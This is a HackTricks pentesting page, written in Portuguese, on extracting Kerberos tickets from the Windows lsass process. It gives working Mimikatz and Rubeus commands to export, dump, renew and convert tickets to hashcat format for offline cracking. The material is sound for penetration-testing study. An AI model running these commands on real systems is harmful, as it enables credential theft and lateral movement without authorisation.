hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
2024-12-12 13:56:11 +01:00

4.2 KiB

Harvesting tickets from Windows

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Os tickets no Windows são gerenciados e armazenados pelo processo lsass (Local Security Authority Subsystem Service), responsável por lidar com políticas de segurança. Para extrair esses tickets, é necessário interagir com o processo lsass. Um usuário não administrativo pode acessar apenas seus próprios tickets, enquanto um administrador tem o privilégio de extrair todos os tickets do sistema. Para tais operações, as ferramentas Mimikatz e Rubeus são amplamente empregadas, cada uma oferecendo diferentes comandos e funcionalidades.

Mimikatz

Mimikatz é uma ferramenta versátil que pode interagir com a segurança do Windows. É usada não apenas para extrair tickets, mas também para várias outras operações relacionadas à segurança.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus é uma ferramenta especificamente projetada para interação e manipulação do Kerberos. É usada para extração e manuseio de tickets, bem como outras atividades relacionadas ao Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Ao usar esses comandos, certifique-se de substituir os espaços reservados como <BASE64_TICKET> e <luid> pelo ticket codificado em Base64 e pelo ID de Logon reais, respectivamente. Essas ferramentas oferecem ampla funcionalidade para gerenciar tickets e interagir com os mecanismos de segurança do Windows.

Referências

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}